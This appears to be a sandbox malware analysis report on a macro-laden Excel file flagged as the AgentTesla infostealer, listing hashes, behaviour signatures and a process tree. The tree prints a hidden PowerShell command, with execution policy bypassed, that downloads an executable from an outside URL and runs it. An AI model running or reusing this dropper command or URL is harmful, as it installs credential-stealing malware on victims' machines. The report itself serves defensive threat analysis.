Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

CO-MFE-6-2020.xlsm

windows7_x64

10

CO-MFE-6-2020.xlsm

windows10_x64

10

Analysis

  • max time kernel
    137s
  • max time network
    137s
  • platform
    windows10_x64
  • resource
    win10v200430
  • submitted
    10/07/2020, 07:13

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    CO-MFE-6-2020.xlsm

  • Size

    173KB

  • MD5

    84ba27c4b3083be263a54322adec3149

  • SHA1

    2548d9097c1b27f064a7089afe393fde0fbfa64d

  • SHA256

    fbe5f71e75c1b92c68a6da3698f42a2ca2f9fcc6f620f494c562583c194b2011

  • SHA512

    1553f2c39b55a83161326b232b507d3cf957f633462ccd6bf19b9f6890ded4d70c7c0459347f88cf45c0c846e54672a393914b6f66778748b351e397743a914e

Score
10/10
spywarekeyloggertrojanstealeragenttesla

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://shopcart.indbytes.com/cig/4501307788.jpg

Signatures

  • Suspicious use of WriteProcessMemory 11 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops startup file 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spyware
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spyware
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spyware
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blacklisted process makes network request 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious use of SetWindowsHookEx 15 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\CO-MFE-6-2020.xlsm"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: AddClipboardFormatListener
    PID:1612
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://shopcart.indbytes.com/cig/4501307788.jpg',$env:Temp+'\Name.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\Name.exe')
      2⤵
      • Suspicious use of WriteProcessMemory
      • Process spawned unexpected child process
      PID:3864
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://shopcart.indbytes.com/cig/4501307788.jpg',$env:Temp+'\Name.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\Name.exe')
        3⤵
        • Suspicious use of WriteProcessMemory
        • Suspicious behavior: EnumeratesProcesses
        • Blacklisted process makes network request
        • Suspicious use of AdjustPrivilegeToken
        PID:3472
        • C:\Users\Admin\AppData\Local\Temp\Name.exe
          "C:\Users\Admin\AppData\Local\Temp\Name.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          • Suspicious use of SetThreadContext
          • Drops startup file
          • Executes dropped EXE
          • Suspicious behavior: MapViewOfSection
          PID:1072
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of AdjustPrivilegeToken
            PID:3792

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/3792-7-0x0000000000400000-0x000000000044C000-memory.dmp

    Filesize

    304KB

    Download